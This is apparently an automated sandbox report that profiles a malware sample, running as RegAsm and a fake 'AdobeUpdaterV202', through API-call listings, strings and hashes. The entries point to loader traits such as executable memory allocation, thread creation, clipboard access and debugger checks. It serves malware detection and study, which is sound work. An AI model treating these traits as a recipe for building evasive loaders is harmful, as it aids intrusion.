                                  • Instruction ID: 8c5cf648e73890f5bfe9a74a7f2d8af43a7cd61e44d7a5fa48d6af44ddd73fda
                                  • Opcode Fuzzy Hash: a423aaed873f755818b785dd9ceb33cadae5c486f88a487e6a397ba98f2ae9bb
                                  • Instruction Fuzzy Hash: A851BF741083418BD324CF14C891BABB3F6FFC6354F04462DF98A9B292EB74A944CB96

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 91 408b70-408b91 call 408c20 call 435930 96 408b93 91->96 97 408b95-408b9c call 430900 91->97 98 408be9-408bf5 ExitProcess 96->98 101 408ba0-408bd3 GetSystemDirectoryW call 408c00 call 409fa0 97->101 102 408b9e 97->102 110 408bd5 101->110 111 408bd7 call 40f670 101->111 103 408be2-408be7 call 4361a0 102->103 103->98 112 408bde-408be0 110->112 115 408bdc 111->115 112->103 115->112
                                  APIs
                                  Strings
                                  • primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection, xrefs: 00408BB4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection
                                  • API String ID: 621844428-744483612
                                  • Opcode ID: 8edf4afe23398db4720b2835e0512189381ad9e2d251b84cbd8fcb29604ee4a6
                                  • Instruction ID: 70bf744a09fd727a259ee1d112b3c9ae749a16f6a6c9cbf4469ea4d0a5ce1dca
                                  • Opcode Fuzzy Hash: 8edf4afe23398db4720b2835e0512189381ad9e2d251b84cbd8fcb29604ee4a6
                                  • Instruction Fuzzy Hash: AFF081F040D6009AD6103B769F0A26E7AB8AF11358F51053FF9C1762C2EE7C640A97AF

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 116 432566-4325d4 call 438440 GetVolumeInformationW
                                  APIs
                                  • GetVolumeInformationW.KERNEL32 ref: 004325B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationVolume
                                  • String ID: C$\
                                  • API String ID: 2039140958-514332402
                                  • Opcode ID: 557d3778fd059ab4a24c9647201a82de3bc481e107b38469c0871c14bac291e7
                                  • Instruction ID: aa0968976cd407e2889a63f84c42208ae0db2403cf3b2c192a3408e2d997dd9b
                                  • Opcode Fuzzy Hash: 557d3778fd059ab4a24c9647201a82de3bc481e107b38469c0871c14bac291e7
                                  • Instruction Fuzzy Hash: 66F05EB5418342DBD704EF25D96432EBBE0FF89318F20CA1DF49993250D7749A948F4A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 559 435b52-435bc9 call 438440 * 3 566 435c25-435c2b LoadLibraryW 559->566 567 435bcb 559->567 568 435c32-435c50 566->568 569 435c2d 566->569 570 435bd0-435c23 567->570 569->568 570->566 570->570
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: ad0b27c512a46cb3d6cf93b8b33958ce21f56b0bfbd34c7d62f7fc7cf985dc34
                                  • Instruction ID: 0602b03d136d9e284aebdb07781a619c93df0bc4458265ec0546250217cefefc
                                  • Opcode Fuzzy Hash: ad0b27c512a46cb3d6cf93b8b33958ce21f56b0bfbd34c7d62f7fc7cf985dc34
                                  • Instruction Fuzzy Hash: 7D313A75A10B029FC319CF29DC91626BBF2FF5A304718563DD08687722EB34A851CB58

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 571 435a37-435a68 572 435a6a 571->572 573 435acc-435ad1 LoadLibraryW 571->573 574 435a70-435aca 572->574 575 435ad3 573->575 576 435ad8-435af4 573->576 574->573 574->574 575->576
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 14c6295b7095769bf3a54fc7fcdda810c9c6f92bc9cadf11b30daa22102dc3f6
                                  • Instruction ID: 1d5776ec028b0a6974c364e7fe12bdbbc675b2445f926a01c41e78e6562ebcf6
                                  • Opcode Fuzzy Hash: 14c6295b7095769bf3a54fc7fcdda810c9c6f92bc9cadf11b30daa22102dc3f6
                                  • Instruction Fuzzy Hash: 7E21B476505A428BD32DCF29D8A0676B3B3FFDA300729962EC49343790DF34A856CB44
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00434288
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 56797e244d9c887197993ba65d14fc659f4b145562bf2d0924e46119da718bac
                                  • Instruction ID: 47c718e6d64a88bce5eedbe1abd2e314879ed8eefa2e60703a1a38b23230c1f9
                                  • Opcode Fuzzy Hash: 56797e244d9c887197993ba65d14fc659f4b145562bf2d0924e46119da718bac
                                  • Instruction Fuzzy Hash: 6FD0127D194500DBDB1C8B20DC44F693762FB95305F64C12CE40207263D6719551CA0C
                                  APIs
                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 0043443C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 826516720434e19dabd8178b9a681ec841bc1f3d1258c80d1e4a8917a25e5104
                                  • Instruction ID: e3354576a8135b39ec0eef0c659ccbd2581c9bf1dab865f8f636db224e40d6d8
                                  • Opcode Fuzzy Hash: 826516720434e19dabd8178b9a681ec841bc1f3d1258c80d1e4a8917a25e5104
                                  • Instruction Fuzzy Hash: 9AB09236740109AEDE111F94FC05BEC7B28EB8022BF2000B2E60D960A1D23299679B94
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Object$DeleteMetricsSelectSystem
                                  • String ID: $1"D$1"D$1"D$1"D$1"D$1"D$1"D$1"D$1"D$v$D$%D$1G
                                  • API String ID: 3911056724-3040188192
                                  • Opcode ID: 5b5127b62be5ad08694142a29e67d50248217d73a3dc84aa0e2d0adb2af5b2ce
                                  • Instruction ID: 5526e87088a16d7261bb02d3a6f37ee32a72f65f87bcab9aaa94f5be93fb6608
                                  • Opcode Fuzzy Hash: 5b5127b62be5ad08694142a29e67d50248217d73a3dc84aa0e2d0adb2af5b2ce
                                  • Instruction Fuzzy Hash: 5CC180B4509380DFE324DF29D58479ABBF0BBC9704F40892EE48987350D7B4A948CF8A
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                  • String ID: @$B$C$E$K$L$M$[$^$v$w
                                  • API String ID: 2832541153-2648654332
                                  • Opcode ID: 9e010b7691e6cecf3eea916d399c6891f274b192d43f8d9153076440e7445c15
                                  • Instruction ID: fa031fb899673b3b3c8b2c77958664f73088c85f9ebfc9e0d915b09b47a5e334
                                  • Opcode Fuzzy Hash: 9e010b7691e6cecf3eea916d399c6891f274b192d43f8d9153076440e7445c15
                                  • Instruction Fuzzy Hash: FE51E5B090C3808FD301DF68D44975EBFE0AB99308F444A2EE4D997292D779DA49CB5B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd85223c53bdbc33de374fa11678d8cc24002f8bc91307d362eec336c8a39dd7
                                  • Instruction ID: 68c45ebc5194ef236972f06cc17f1d4fd4e2e5e0e46ab3d52ef1892f10298282
                                  • Opcode Fuzzy Hash: fd85223c53bdbc33de374fa11678d8cc24002f8bc91307d362eec336c8a39dd7
                                  • Instruction Fuzzy Hash: 8AE0E5B05053008FD314EF28D4A4B56FBE0BF88304F12891EE4AB9B391D7B8A954CB45
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA762F
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA7658
                                  • GetACP.KERNEL32(?,?,00EA78B4,?,00000000), ref: 00EA766D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
                                  • Instruction ID: 30ab302e0cea297d5704a862d9b9e0eefe54e235907f06efe18418c27819bece
                                  • Opcode Fuzzy Hash: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
                                  • Instruction Fuzzy Hash: 2B219521A08500AADB34CF19CD05BD773A7EF9AB98B569464E98AFF100E732FD41C350
                                  APIs
                                    • Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
                                    • Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00E9EAF6
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EA7877
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00EA78C0
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00EA78CF
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA7917
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA7936
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
                                  • Instruction ID: d1066bc1f813f45b51d3cdaca275b2a85df5e28fdf8f1cf616956ad50ab9bf17
                                  • Opcode Fuzzy Hash: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
                                  • Instruction Fuzzy Hash: 8151AD71A04215AFEB14DFA5CC85ABE77B8BF0E300F145429E581FB150EB74A904CB60
                                  APIs
                                    • Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
                                    • Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00E9EAF6
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EA6EC8
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00EA6EF3
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EA7056
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
                                  • Instruction ID: 8b6b53462f19656ba86964cd8b2b70a144c8888795098cdf0ccaecdc25c39e96
                                  • Opcode Fuzzy Hash: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
                                  • Instruction Fuzzy Hash: CC71C275700206AEDB24AF34DC46BAA77E8EF4F708F18642AF505FE581EB74F9408660
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E94D72
                                  • IsDebuggerPresent.KERNEL32 ref: 00E94E3E
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94E57
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00E94E61
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
                                  • Instruction ID: fcacecbf968194ebf7d998c59bc7e4a1899098b1fc839e5f45e7d303bf55459f
                                  • Opcode Fuzzy Hash: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
                                  • Instruction Fuzzy Hash: 993107B5D052189ADF21DF64D989BCDBBB8AF08300F1051AAE40DAB290E7719A858F44
                                  APIs
                                    • Part of subcall function 00E910D0: __EH_prolog3_catch.LIBCMT ref: 00E910D7
                                    • Part of subcall function 00E910D0: _strlen.LIBCMT ref: 00E910E9
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EAC285
                                    • Part of subcall function 00E9163E: _strlen.LIBCMT ref: 00E91656
                                  • _strlen.LIBCMT ref: 00EAC2A0
                                  • _strlen.LIBCMT ref: 00EAC2B6
                                  • GetProcAddress.KERNEL32(00000000,?,ole,00000000,Cons,00000000,Free), ref: 00EAC2D3
                                    • Part of subcall function 00EAC1F7: VirtualAlloc.KERNEL32(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
                                    • Part of subcall function 00EAC1F7: CreateThread.KERNEL32(00000000,00000000,00000188,00EB7030,00000000,00000000,?,?,00EAC2E6), ref: 00EAC23F
                                    • Part of subcall function 00EAC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
                                    • Part of subcall function 00EAC1F7: CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252
                                    • Part of subcall function 00E91BEA: _Deallocate.LIBCONCRT ref: 00E91BF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                  • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                  • API String ID: 4115190924-2348686229
                                  • Opcode ID: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
                                  • Instruction ID: c3519cf0fd71efebbf88634c3a0ce197cdafabd5045aa524cd8769405ea26613
                                  • Opcode Fuzzy Hash: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
                                  • Instruction Fuzzy Hash: 0E018471E08209AEDF14EBA4DC46CFEB3F8EE9A710710105AF802B6191EE74B906D665
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00E97D07
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00E97E15
                                  • _UnwindNestedFrames.LIBCMT ref: 00E97F67
                                  • CallUnexpected.LIBVCRUNTIME ref: 00E97F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2751267872-393685449
                                  • Opcode ID: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
                                  • Instruction ID: 762c12f6d874837080efa91a7247b2f99907319de97b1b78c8a6181717cfa205
                                  • Opcode Fuzzy Hash: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
                                  • Instruction Fuzzy Hash: EEB18A71928209EFCF29DFA4C8819AEBBB5BF04314F146059E8917B212D731EE59CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
                                  • Instruction ID: 66c19a5b8186f07b76af97f737ad56503cb0ffd439e31218692ec8f31ef70a80
                                  • Opcode Fuzzy Hash: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
                                  • Instruction Fuzzy Hash: C7B1EF74A04249AFDB15DF98D880BBEBBF5BF8B304F149199E550BF292C770A941CB60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$Info
                                  • String ID:
                                  • API String ID: 127012223-0
                                  • Opcode ID: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
                                  • Instruction ID: d6cccf7f4179006bb7e741b3f9ab6b8a7e253ca18f375fd2d4a0dbc8e547a602
                                  • Opcode Fuzzy Hash: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
                                  • Instruction Fuzzy Hash: 7971B3729002096BDF219A649C82FAF77E9DF8F318F252059E815BF292D735AD01C764
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E942E3
                                  • __alloca_probe_16.LIBCMT ref: 00E9430F
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E9434E
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E9436B
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E943AA
                                  • __alloca_probe_16.LIBCMT ref: 00E943C7
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E94409
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E9442C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2040435927-0
                                  • Opcode ID: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
                                  • Instruction ID: ee326f976f351e4463ddcd7406c4873eee018c4cfeaecfdfee75d0f232b7be38
                                  • Opcode Fuzzy Hash: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
                                  • Instruction Fuzzy Hash: 9F518DB250020AAFEF209F64CC85FAF7BBAEF44759F155125FD15B6190D7309C128BA0
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00E976B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00E976BF
                                  • _ValidateLocalCookies.LIBCMT ref: 00E97748
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00E97773
                                  • _ValidateLocalCookies.LIBCMT ref: 00E977C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
                                  • Instruction ID: 0d5a44efc33d6a11f7265c2f08a3bb553b5d8445da63f80ce4513e1a864e8af3
                                  • Opcode Fuzzy Hash: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
                                  • Instruction Fuzzy Hash: 3641C334A142199FCF10DFA8CC85A9E7BF1BF46315F149096E854BB392D731AD09CB90
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00E9F0B5,?,?,00000000,00000000), ref: 00E9F069
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
                                  • Instruction ID: 531a082dae165969a8cf78a3014fc92928714ced363a10a022ebe910df38e6f1
                                  • Opcode Fuzzy Hash: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
                                  • Instruction Fuzzy Hash: F4212731A01210ABCF219B21AC84A9E375CAF123B8F241130EA16FB3D2EB70FD01C6D0
                                  APIs
